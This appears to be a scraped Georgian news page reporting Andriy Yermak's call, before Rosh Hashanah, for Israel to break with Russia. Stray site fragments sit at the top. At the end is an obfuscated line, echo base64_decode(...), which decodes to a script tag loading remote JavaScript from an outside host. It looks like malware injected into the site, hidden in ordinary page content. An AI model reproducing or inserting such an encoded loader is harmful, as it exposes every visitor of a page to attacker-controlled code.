celsiusi
ავერსი საქკაბელი

ანდრეი ერმაკი ისრაელს მოუწოდებს, გაწყვიტოს კავშირი რუსულ ბარბაროსულ სახელმწიფოსთან. აღნიშნულის შესახებ, უკრაინის პრეზიდენტის ადმინისტრაციის ხელმძღვანელმა სოციალურ ქსელში დაწერა.

„რუსული პროპაგანდითა და დეზინფორმაციით გაჯერებულ სამყაროში ცოტაა უდავო ჭეშმარიტება. მაგრამ ერთი რამ ცხადია, ისრაელი და უკრაინა ერთსა და იმავე ომს აწარმოებენ – ომს ტერორისტების წინააღმდეგ, რომლებიც მთელი ერის განადგურებას ცდილობენ. განსაცდელების რთულ ჟამს უკრაინას სჭირდება ერთგული მოკავშირეები, რომლებსაც შეუძლიათ და მზად არიან, გაიზიარონ ჩვენი ტვირთი, რადგან მათ იციან თავისუფლებისა და მშვიდობის ნამდვილი ღირებულება. როდესაც ებრაელები მთელს მსოფლიოში ფიქრობენ გასულ წელზე, მოგზაურობებზე, ნაკლოვანებებსა და ზრდაზე, ჩვენ მოვუწოდებთ ისრაელს, ასევე დაფიქრდეს და მეტი გააკეთოს, რათა დაეხმაროს უკრაინას მისი ცხოვრების წესის და როგორც ასეთი, ცხოვრების დასაცავად“, – აღნიშნა ერმაკმა.

​მისი თქმით, უკრაინა ღრმად შეწუხებულია იმის გამო, რომ უნდა ურჩიოს მოსახლეობას არ წავიდნენ „როშ ჰაშანას“ აღსანიშნად (ებრაული ახალი წელი) უმანში, რაც რუსეთის ტერორისტული სახელმწიფოს მხრიდან არაპროვოცირებული აგრესიის მტკივნეული შეხსენებაა.

„როშ ჰაშანას წინა დღეს, როდესაც ჩვენ ვცდილობთ საკუთარ თავში ჩაღრმავებას, ისრაელი უნდა გახდეს ჩვენი საიმედო პარტნიორი ტერორიზმთან ბრძოლაში. დროა შეჩერდეთ თვითრეფლექსიისთვის და გაწყვიტოთ კავშირი მზაკვრულ და ბარბაროსულ რუსულ სახელმწიფოსთან“, – განაცხადა ერმაკმა.

449
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");